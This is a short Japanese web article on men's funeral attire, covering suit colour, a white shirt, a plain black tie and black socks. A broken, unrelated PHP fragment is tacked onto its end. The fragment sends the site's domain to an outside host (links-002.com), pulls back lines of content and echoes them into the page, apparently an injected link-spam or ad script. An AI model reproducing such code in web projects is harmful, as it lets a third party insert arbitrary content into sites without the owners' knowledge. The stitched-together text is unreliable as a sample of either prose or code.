男性のお葬式での服装について

お葬式は故人を弔うための大事な儀式となりますので、もちろん相応のマナーが存在します。特に服装には注意が必要です。故人の親族よりも格が上となってしまうような目立つ格好をしてはいけません。参列者側は通常は略式の礼服を着用することとなります。この時に男性と女性では注意点が異なってきます。今回は男性の服装の注意点についてご紹介します。まずはスーツですが、これはブラックのものが最適となります。もしブラック系のスーツが無ければダークグレーか濃紺のスーツを着用するようにしましょう。次にシャツですが、白が基本となりますので、柄物は避けなければなりません。そしてネクタイですが、こちらも黒の無地が基本となります。最後に靴下については、靴を脱ぐような斎場もありますので、黒が基本となります。目立つような白や柄物は避けるようにしましょう。このようにお葬式の際には服装についても細かい決まりがあります。故人と親族に失礼とならないような服装を心掛けるようにしましょう。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>